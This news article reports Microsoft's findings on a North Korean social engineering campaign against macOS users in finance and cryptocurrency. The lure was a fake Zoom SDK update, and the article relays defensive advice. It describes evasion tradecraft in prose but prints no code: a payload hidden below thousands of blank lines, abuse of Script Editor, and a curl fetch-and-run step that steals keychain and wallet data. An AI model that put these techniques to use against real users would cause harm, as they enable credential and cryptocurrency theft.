pinkeyes - stock.adobe.com
North Korean social engineering campaign targets macOS users
A MacOS-focused social engineering campaign orchestrated by North Korea-based threat actor Sapphire Sleet has been exposed by Microsoft’s Threat Intelligence Unit.
A North Korean social engineering campaign targeting macOS users tricked its victims into manually executing malicious files by impersonating a software update led to the theft of credentials, crypto assets, and personal data, according to Microsoft’s Threat Intelligence unit, MSTIC.
In a new report published this week, MSTIC exposed the campaign – run by a threat actor tracked as Sapphire Sleet – which highlights how convincing user prompts and trusted system tools are still a highly-valuable tool for attackers of all stripes. This particular campaign, said MSTIC, demonstrated some new combinations of macOS-focused techniques that, though not novel in and of themselves, come as something of a surprise from a threat actor like Sapphire Sleet.
MSTIC explained how the group is now shifting attack execution away from the exploitation of software vulnerabilities and into a “user-initiated” context. Crucially for Sapphire Sleet, this enables its attack chain to move ahead beyond the oversight of macOS’ onboard protections, like Transparency, Consent and Control (TCC), Gatekeeper, quarantine enforcement, and notarisation checks.
“Sapphire Sleet achieves a highly reliable infection chain that lowers operational friction and increases the likelihood of successful compromise – posing an elevated risk to organisations and individuals involved in cryptocurrency, digital assets, finance, and similar high‑value targets that Sapphire Sleet is known to target,” said the MSTIC team.
“After discovering the threat, Microsoft shared details of this activity with Apple as part of our responsible disclosure process.”
A danger to financial services
Backed by the isolated, reclusive and destitute regime in Pyongyang, Sapphire Sleet has been operational since about March 2020 and is suspected to have links to the rather more notorious Lazarus operation.
According to MSTIC, it specialises in targeting the financial services sector, including venture capital firms and organisations involved in blockchain and cryptocurrency. Its prime motivation is to loot its victims’ crypto wallets to generate revenue for its paymasters, and to steel intellectual property (IP) and tech secrets related to blockchain and crypto trading.
Sapphire Sleet is a North Korean state actor active since at least March 2020 that primarily targets the finance sector, including cryptocurrency, venture capital, and blockchain organizations. The primary motivation of this actor is to steal cryptocurrency wallets to generate revenue, and target technology or intellectual property related to cryptocurrency trading and blockchain platforms.
In this campaign, its playbook saw the group run fake recruitment profiles on professional networking and social media sites, through which selected targets were roped into conversations about job opportunities. ‘Successful’ candidates were then invited to a technical interview during which they were directed to install Sapphire Sleet’s malware, disguised as a software developer kit (SDK) update for the Zoom videoconferencing tool.
The file, Zoom SDK Update.scpt was a compiled AppleScript that opened by default in macOS Script Editor, a trusted Apple application that can execute arbitrary shell commands. Victims were lured into a false sense of security with large blocks of decoy upgrade instructions that mimicked a routine software update. Beneath this text was inserted thousands of blank lines to push the malicious script beyond the immediately scrollable view – a crude but effective technique.
The script then launched a command to launch a trusted Apple-signed process to reinforce the appearance of a genuine update. Following this, it executed its malicious payload, retrieving threat actor-controlled content via curl, and passing it back to be run. This content also took the form of an AppleScript so that it could again launch within Script Editor to initiate delivery of the final payload – the attack orchestrator – for system reconnaisance and other operations.
Data exfiltrated by Sapphire Sleet during these attacks is known to have included Apple notes data, crypto wallet data, browser data and keychain information, and Telegram credentials and session data, among other things.
Next steps
Behind the scenes, Apple has already implemented platform-level protections to detect and block Sapphire Sleet’s infrastructure and malwares, and deployed browsing protections in Safari. It has also issued new signatures to detect and block the malwares associated with the campaign, which should already have been received by devices running macOS.
MSTIC advised organisations that may be at risk of falling victim to this – or similar – campaigns, should conduct user education on threats emanating from social media and external platforms, especially outreach that seems to require they download software or virtual meeting tools, or execute terminal demands.
Security teams may also wish to consider blocking or restricting the execution of compiled AppleScript files and unsigned Mach-O binaries downloaded from the internet. Any such files downloaded from external sources should of course be rigorously inspected and verified. It may also be wise to limit or at least audit the use of curl, particularly when piped to interpreters.
Defenders should also monitor for unauthorised modifications to the macOS TCC database, a feature of this campaign, and audit LaunchDaemon and LaunchAgent installations
MSTIC also advised organisations and users to be cautious when copying and pasting sensitive data related to cryptocurrency, such as wallet addresses or credentials, and to check and verify the pasted content matches the intended source, and to protect crypto wallets and rotate any browser-stored credentials.
Read more about social engineering
- NCSC advises on countermeasures for high-risk individuals over phishing attacks on encrypted messaging services, such as Signal, WhatsApp and Facebook Messenger.
- Computer Weekly gets under the skin of an ongoing wave of ShinyHunters cyber attacks orchestrated via social engineering against Salesforce users.
- Organizations and employees must both do their part to prevent and avoid social engineering attacks. A combination of security controls, policies, procedures and training is necessary.
